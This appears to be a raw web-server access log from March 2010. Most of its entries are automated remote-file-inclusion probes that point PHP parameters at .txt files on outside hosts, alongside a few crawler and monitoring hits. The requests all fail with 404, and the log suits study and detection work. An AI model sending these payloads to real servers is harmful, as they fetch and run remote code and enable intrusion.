212.241.177.123 - - [19/Mar/2010:04:24:55 -0400] "GET /logs/access_log.Q109053000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:25:10 -0400] "GET /logs/error_log.Q109060600//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:25:20 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:25:20 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:25:20 -0400] "GET /logs/access_log.Q110031100%20%20/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:25:20 -0400] "GET /logs/error_log.Q110020300%20%20/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:25:23 -0400] "GET /logs/access_log.Q110021400//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:26:09 -0400] "GET /logs/access_log.Q110021400//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:26:18 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:26:18 -0400] "GET /logs/error_log.Q110020300%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:26:18 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:26:18 -0400] "GET /logs//include/mail.inc.php?root=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:26:18 -0400] "GET /logs/access_log.Q109091100%20%20//include/mail.inc.php?root=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:26:18 -0400] "GET //include/mail.inc.php?root=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:26:19 -0400] "GET //include/mail.inc.php?root=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:26:19 -0400] "GET /logs/access_log.Q109091100//include/mail.inc.php?root=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:26:19 -0400] "GET /logs/access_log.Q109102100//include/mail.inc.php?root=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:26:19 -0400] "GET /logs//include/mail.inc.php?root=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:04:25:57 -0400] "GET /logs/error_log.Q109100600 HTTP/1.1" 200 4163007 "-" "Yandex/1.01.001 (compatible; Win16; I)"
125.247.160.130 - - [19/Mar/2010:04:26:28 -0400] "GET /logs/access_log.Q110031100%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:26:30 -0400] "GET /logs/access_log.Q109102100%20%20//include/mail.inc.php?root=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:26:48 -0400] "GET /logs/access_log.Q110021400%20%20//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:04:27:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.28.110.99 - - [19/Mar/2010:04:27:37 -0400] "GET /agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:04:27:37 -0400] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:04:27:37 -0400] "GET /logs/error_log.Q109061800/agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:04:27:42 -0400] "GET /logs/error_log.Q110020300/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:04:27:42 -0400] "GET /logs/access_log.Q110031100/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:04:27:55 -0400] "GET /logs/error_log.Q110020300/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:04:27:59 -0400] "GET /logs/error_log.Q109070600/agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:28:03 -0400] "GET /logs/access_log.Q109122500//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
123.125.66.89 - - [19/Mar/2010:04:28:06 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
125.251.189.4 - - [19/Mar/2010:04:28:07 -0400] "GET /logs/access_log.Q110021400//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
125.243.195.66 - - [19/Mar/2010:04:28:20 -0400] "GET /logs/access_log.Q110022500//?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/com002/img00.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.243.195.66 - - [19/Mar/2010:04:28:31 -0400] "GET /logs/access_log.Q110020600//?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/com002/img00.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:28:45 -0400] "GET /logs/access_log.Q109122500//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
220.181.7.81 - - [19/Mar/2010:04:28:46 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
212.241.177.123 - - [19/Mar/2010:04:29:10 -0400] "GET /agendax/addevent.inc.php?agendax_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:29:10 -0400] "GET /logs/access_log.Q109092200/agendax/addevent.inc.php?agendax_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:29:10 -0400] "GET /logs/agendax/addevent.inc.php?agendax_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:29:21 -0400] "GET /logs/access_log.Q109091100%20%20//include/mail.inc.php?root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:29:21 -0400] "GET /logs//include/mail.inc.php?root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:29:21 -0400] "GET //include/mail.inc.php?root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:29:28 -0400] "GET /logs//include/mail.inc.php?root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:29:28 -0400] "GET //include/mail.inc.php?root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:29:28 -0400] "GET /logs/access_log.Q109091100%20%20//include/mail.inc.php?root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:29:30 -0400] "GET /logs/access_log.Q109102100%20%20//include/mail.inc.php?root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
201.24.87.113 - - [19/Mar/2010:04:29:30 -0400] "GET /logs/access_log.Q109052000//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:29:35 -0400] "GET /logs/access_log.Q109122500%20%20//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:29:39 -0400] "GET /logs/access_log.Q109102100%20%20//include/mail.inc.php?root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:29:39 -0400] "GET /logs/access_log.Q109062800/agendax/addevent.inc.php?agendax_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:04:29:52 -0400] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:04:29:52 -0400] "GET /logs/access_log.Q110021300/agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:04:29:52 -0400] "GET /agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:04:29:53 -0400] "GET /logs/access_log.Q109052300/agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:05 -0400] "GET /index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:05 -0400] "GET /logs/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /logs/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /logs/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /logs/access_log.Q109062900/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /logs/access_log.Q109062900/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /logs/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /logs/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /logs/access_log.Q109062900/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /logs/access_log.Q109062900/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:06 -0400] "GET /logs/access_log.Q109062900/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:07 -0400] "GET /logs/access_log.Q109062900%20%20/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:07 -0400] "GET /logs/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:07 -0400] "GET /logs/access_log.Q109062900%20%20/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:07 -0400] "GET /logs/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:07 -0400] "GET /index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:07 -0400] "GET /logs/access_log.Q109062900%20%20/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:07 -0400] "GET /index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:07 -0400] "GET /index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:07 -0400] "GET /logs/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:08 -0400] "GET /index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:08 -0400] "GET /logs/access_log.Q109062900%20%20/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:08 -0400] "GET /logs/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:08 -0400] "GET /index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:08 -0400] "GET /logs/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:08 -0400] "GET /logs/access_log.Q109062900%20%20/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:12 -0400] "GET /logs/access_log.Q109102000%20%20/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:12 -0400] "GET /logs/access_log.Q109102000%20%20/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:12 -0400] "GET /logs/access_log.Q109102000%20%20/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:13 -0400] "GET /logs/access_log.Q109102000%20%20/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:13 -0400] "GET /logs/access_log.Q109102000%20%20/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:04:30:15 -0400] "GET /logs/access_log.Q109061800/agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:19 -0400] "GET /logs/access_log.Q109102000/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:19 -0400] "GET /logs/access_log.Q109102000/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:19 -0400] "GET /logs/access_log.Q109102000/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:19 -0400] "GET /logs/access_log.Q109102000/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:20 -0400] "GET /logs/access_log.Q109102000/index.phpmain.php?x=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:30:25 -0400] "GET /logs/access_log.Q109122500//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:31:19 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:31:19 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:31:19 -0400] "GET /logs/access_log.Q109072700%20%20//bemarket/postscript/postscript.php?p_mode=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:31:28 -0400] "GET /logs/error_log.Q109112800%20%20//bemarket/postscript/postscript.php?p_mode=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:04:31:38 -0400] "GET /logs/error_log.Q110011400 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
125.247.160.130 - - [19/Mar/2010:04:31:46 -0400] "GET /logs/access_log.Q109121400%20%20/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:31:46 -0400] "GET /logs/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:31:46 -0400] "GET /template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
81.171.114.130 - - [19/Mar/2010:04:31:51 -0400] "GET //include/mail.inc.php?root=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 404 219 "-" "-"
125.247.160.130 - - [19/Mar/2010:04:31:55 -0400] "GET /logs/access_log.Q110030800%20%20/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:32:04 -0400] "GET /logs/access_log.Q110021400%20%20//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:32:16 -0400] "GET /logs/access_log.Q109121400%20%20/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:32:16 -0400] "GET /template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:32:16 -0400] "GET /logs/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:32:26 -0400] "GET /logs/access_log.Q110030800%20%20/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:32:31 -0400] "GET /logs/access_log.Q109121400%20%20/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:32:31 -0400] "GET /template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:32:31 -0400] "GET /logs/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:32:44 -0400] "GET /logs/access_log.Q110030800%20%20/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.24.87.113 - - [19/Mar/2010:04:32:51 -0400] "GET /logs/access_log.Q110021600//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
203.223.177.217 - - [19/Mar/2010:04:32:51 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 249 "-" "-"
203.223.177.217 - - [19/Mar/2010:04:32:51 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 254 "-" "-"
95.110.196.60 - - [19/Mar/2010:04:33:10 -0400] "GET /index.php?pg=http://solid.go.ro/id2009.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
95.110.196.60 - - [19/Mar/2010:04:33:11 -0400] "GET /logs/index.php?pg=http://solid.go.ro/id2009.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
87.106.132.3 - - [19/Mar/2010:04:33:25 -0400] "GET /87http://www.clubampere.org/logs/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
82.179.244.70 - - [19/Mar/2010:04:33:28 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:33:28 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:33:28 -0400] "GET /logs/access_log.Q109052900%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:33:28 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:33:41 -0400] "GET /logs/access_log.Q109091100%20%20//include/mail.inc.php?root=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:04:33:41 -0400] "GET /logs/access_log.Q109102100%20%20//include/mail.inc.php?root=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:04:33:55 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:04:33:55 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:04:33:55 -0400] "GET /logs/access_log.Q109072500%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:04:34:00 -0400] "GET /logs/access_log.Q109050700%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:04:34:07 -0400] "GET /agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:04:34:07 -0400] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:04:34:12 -0400] "GET /logs/access_log.Q109061800%20%20/agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:34:12 -0400] "GET /logs/access_log.Q110030300%20%20//board//bbs//////////good.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
